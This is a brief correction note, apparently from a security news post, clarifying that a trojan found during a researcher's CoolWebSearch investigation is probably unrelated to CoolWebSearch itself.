Correction: CoolWebSearch probably has nothing to do with this. The trojan was found during a CWS investigation by a researcher, but it is not otherwise related to CoolWebSearch.